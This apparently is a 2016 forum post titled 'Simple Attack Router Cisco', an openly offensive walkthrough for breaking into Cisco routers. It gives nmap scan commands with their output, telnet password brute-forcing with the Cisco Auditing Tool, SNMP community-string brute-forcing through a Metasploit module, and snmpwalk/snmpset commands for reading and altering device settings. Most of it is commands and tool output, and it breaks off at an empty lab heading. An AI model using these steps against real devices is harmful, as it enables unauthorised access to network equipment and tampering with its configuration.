Post Fri Aug 12, 2016 1:38 am

Simple Attack Router Cisco

Hello Anybody,

I want to share about How to simple attack Router, maybe in case Router Cisco

First we must scanning with nmap : we can combine attack TCP and UDP..

We hope router open remote access (tcp) and snmp in port (udp)

Use Backtrack or Kali Linux :
nmap -sS -sU -T5

29954U@root:/pentest/cisco$ nmap -sS -sU -T5

Starting Nmap 5.59BETA1 ( ) at 2012-05-12 09:04 EDT
Warning: giving up on port because retransmission cap hit (2).
Nmap scan report for
Host is up (0.0022s latency).
Not shown: 1248 closed ports, 749 open|filtered ports
23/tcp open telnet
79/tcp open finger
161/udp open snmp
MAC Address: 00:02:FD:60:77:20 (Cisco Systems)

and then you can see port 23/tcp and 161/udp is open, so we can attack now

Telnet : We can bruteforce using hydra or cisco tools

29954U@root:/pentest/cisco/cisco-auditing-tool$ ./CAT -h -w /pentest/passwords/john/password.lst

Cisco Auditing Tool - g0ne [null0]

Checking Host:

Guessing passwords:

Invalid Password: cisco
Invalid Password: ciscos
Invalid Password: cisco1
Invalid Password: router

now you can attack snmp to bruteforce with msfconsole :

msf > use auxiliary/scanner/snmp/snmp_login
msf auxiliary(snmp_login) > set RHOSTS
rhosts =>
msf auxiliary(snmp_login) > set THREADS 3
threads => 3
msf auxiliary(snmp_login) > exploit

if success you can see community to read and write...

You can command

snmpwalk -mALL -v1 -c public

or if you must exploit you can change with

snmpset -c ILMI -v 2c i 1

All techniq about change you can see in wiki snmpset

Detail Lab :